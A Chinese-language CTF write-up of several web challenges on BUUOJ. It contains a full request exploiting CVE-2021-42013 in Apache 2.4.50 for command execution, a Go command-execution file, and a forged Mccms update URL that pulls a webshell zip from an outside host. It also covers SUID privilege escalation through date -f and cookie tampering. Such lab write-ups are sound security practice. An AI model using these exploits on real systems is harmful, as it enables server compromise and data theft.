Power Cookie
发现set-cookie:admin=0
因此添加cookie:admin=1即可
魔法浏览器
f12看到一串js代码,控制台打印得到ua头
更换得到flag
getme
页面源码有提示
抓包发现Apache/2.4.50
搜索发现该版本存在CVE-2021-42013,存在目录穿越,可以直接读取文件或rce
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: node4.buuoj.cn:25647
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT
If-None-Match: "8d-5de58c91a8500"
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
echo;cat /diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg
hackme
访问users会提示
所以只需上传一个users.go文件即可
没学过go,网上找的
package main
import (
"bytes"
"fmt"
"log"
"os/exec"
)
const ShellToUse = "bash"
func Shellout(command string) (error, string, string) {
var stdout bytes.Buffer
var stderr bytes.Buffer
cmd := exec.Command(ShellToUse, "-c", command)
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
return err, stdout.String(), stderr.String()
}
func main() {
err, out, errout := Shellout("cat /flag")
if err != nil {
log.Printf("error: %v\n", err)
}
fmt.Println("--- stdout ---")
fmt.Println(out)
fmt.Println("--- stderr ---")
fmt.Println(errout)
}
当时没做出来,没想到要传users.go,一直随便命名的,一直不对,因为没学过go,还以为是网上找的代码有问题。。。
fxxkgo
go的代码审计,告辞
ezcms
唉,这种cms的审计还是不会,得找时间补补
用Seay打开,自动审计处几百个漏洞点
看wp知道,这题的漏洞点在这(话说正常做题的话是要一个个看下来吗)
Update.php
<?php
/*
'软件名称:漫城CMS(Mccms)
'官方网站:http://www.mccms.cn/
'软件作者:桂林崇胜网络科技有限公司(By:烟雨江南)
'--------------------------------------------------------
'Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
'遵循Apache2开源协议发布,并提供免费使用。
'--------------------------------------------------------
*/
defined('BASEPATH') OR exit('No direct script access allowed');
class Update extends Mccms_Controller {
function __construct(){
parent::__construct();
//判断是否登陆
$this->admin->login();
}
//更新
public function index()
{
$zipurl = $this->input->get('url',true);
$token = $this->input->get('token',true);
if(empty($zipurl)) $this->msg('更新包地址为空');
$md5 = md5($zipurl.Mc_Encryption_Key);
//下载文件
$zipurl = sys_auth($zipurl,1);
if(empty($zipurl)) $this->msg('更新包地址错误');
//获取文件头信息
$arr = get_headers($zipurl,true);
if($arr['Content-Type'] !== 'application/zip') $this->msg('压缩包不zip类型文件');
$data = getcurl($zipurl);
if(empty($data)) $this->msg('获取压缩包失败');
$file_zip = FCPATH."caches/upzip/".end(explode('/',$zipurl));
if(!file_put_contents($file_zip, $data)) $this->msg('压缩包下载失败');
//解压
$this->load->library('mczip');
$this->mczip->PclZip($file_zip);
if ($this->mczip->extract(PCLZIP_OPT_PATH, FCPATH, PCLZIP_OPT_REPLACE_NEWER) == 0) {
unlink($file_zip);
$this->msg('文件解压失败,或者没有权限覆盖文件~!');
}else{
unlink($file_zip);
$this->msg('版本升级成功~!',1);
}
}
public function msg($txt,$zt=0){
$color = $zt == 0 ? 'red' : '#080';
echo '<link rel="stylesheet" href="'.Web_Path.'packs/admin/css/style.css"><div style="padding:50px;"><fieldset class="layui-elem-field"><legend><b>更新状态</b></legend><div class="layui-field-box" style="color:'.$color.';font-size:16px;">'.$txt.'</div></fieldset></div>';
if($zt == 1){
echo '<script>setTimeout(function(){parent.location.reload();},2000);</script>';
}
exit;
}
}可以看到会远程加载一个zip文件然后解压更新
Mc_Encryption_Key为全局变量
sys_auth为加解密函数
getcurl为获取远程内容
因此我们需要传入一个加密过的url地址,内容为一句话套个zip
<?php
define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');
$strings = 'https://xxx/shell.zip';
echo(sys_auth($strings));
function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
if(is_array($string)) $string = json_encode($string);
if($type == 1) $string = str_replace('-','+',$string);
$ckey_length = 4;
$key = md5($key ? $key : Mc_Encryption_Key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $type == 1 ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($type == 1) {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
$result = substr($result, 26);
$json = json_decode($result,1);
if(!is_numeric($result) && $json){
return $json;
}else{
return $result;
}
}
return '';
}
return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}
然后访问
http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/admin.php/update?url=7cd7JNh1v1QgVwK42dyWMvv4lUhGeXhsJdy2EwOyln9E4mz08u5PxVCL4UTxvhxIN4F00bMKJLfsduaC6fMc蚁剑连接
http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/shell.php
但这题好像有好多非预期,也就是说这个cms还有好多漏洞,抽空可以试着审一审
rootme
这题是misc里的,已经不碰misc了,但看了眼wp,感觉这题更像web题
先ssh连接
ssh ubuntu@node4.buuoj.cn -p 28081flag在/root/flag.txt中,显然是没有权限读的
查看具有suid的文件
find / -perm -u=s -type f 2>/dev/null
发现date
date其实是可以读文件的
date -f /root/flag.txt